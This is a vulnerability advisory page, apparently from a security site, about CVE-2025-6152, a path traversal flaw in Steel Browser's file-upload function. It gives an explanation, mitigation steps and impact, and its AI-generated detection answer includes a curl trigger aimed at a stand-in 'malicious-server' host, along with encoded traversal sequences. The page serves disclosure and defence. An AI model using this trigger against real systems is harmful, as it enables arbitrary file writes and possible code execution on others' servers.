CVE-2025-6152
BaseFortify
Publication date: 2025-06-17
Last updated on: 2025-07-02
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
| Metric | Value |
|---|---|
| Probability | |
| Percentile | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| steel | browser | 0.1.1 |
| steel | browser | 0.1.2 |
| steel | browser | 0.1.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring and analyzing file upload requests to the Steel Browser API, specifically those that use the 'fileUrl' parameter. When the server fetches that URL, inspect the Content-Disposition header of the response for filenames that contain path traversal sequences such as '../', including percent-encoded variants ('%2e%2e%2f', '..%2F') and the RFC 5987 'filename*=' form, since those decode to the same bytes. To reproduce the issue, run a local HTTP server that answers with a crafted Content-Disposition header and point the /v1/sessions/{sessionId}/files endpoint at it with the fileUrl parameter. A curl request of this shape can be used as the trigger (confirm against the API of the deployed version whether fileUrl is passed in the query string or the request body):

```shell
curl -X POST "http://<steel-browser-host>/v1/sessions/<sessionId>/files?fileUrl=http://malicious-server/file" \
  -H "Content-Type: application/json"
```

Here malicious-server returns a Content-Disposition header whose filename carries the traversal payload. Capturing HTTP headers with a network monitoring tool, and watching for unexpected file creations outside the intended upload directory inside the container, are further ways to spot exploitation attempts. [4]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to apply the available patch, identified by commit 7ba93a10000fb77ee01731478ef40551a27bd5b9, which fixes the improper sanitization of filenames in the handleFileUpload function. Until the patch is applied, restrict or disable the file upload functionality that uses the 'fileUrl' parameter. Independently of the patch, validate and sanitize any filename extracted from HTTP headers before using it in a path: keep only the final path component and verify that the resolved target still lies under the upload directory. Restricting network access to the vulnerable API endpoints and running the application with least privilege (a non-root user and a read-only container filesystem where possible) reduce the impact of a successful exploit. [2, 3, 4]
Can you explain this vulnerability to me?
CVE-2025-6152 is a critical path traversal vulnerability in Steel Browser versions up to and including 0.1.3. It occurs in the handleFileUpload function when a file is uploaded via the fileUrl parameter: the server fetches the URL and takes the filename from the Content-Disposition header of the response without sanitizing it. An attacker who controls that response can supply a filename containing traversal sequences (e.g., ../../../), and because the name is joined onto the upload directory as-is, the resulting path resolves outside that directory. The attack is performed remotely with a specially crafted upload request and yields an arbitrary file write, limited only by the permissions of the Steel Browser process, within the container filesystem. [1, 2, 4]
How can this vulnerability impact me?
This vulnerability allows remote attackers to write arbitrary files anywhere the Steel Browser process has write permission in the container filesystem. That can mean creating new files or overwriting existing ones, which in turn can lead to remote code execution, compromise of the container, or disruption of service. The flaw therefore affects confidentiality, integrity, and availability, and is a serious risk especially in cloud or containerized deployments where the browser service is reachable over the network. [1, 2, 4]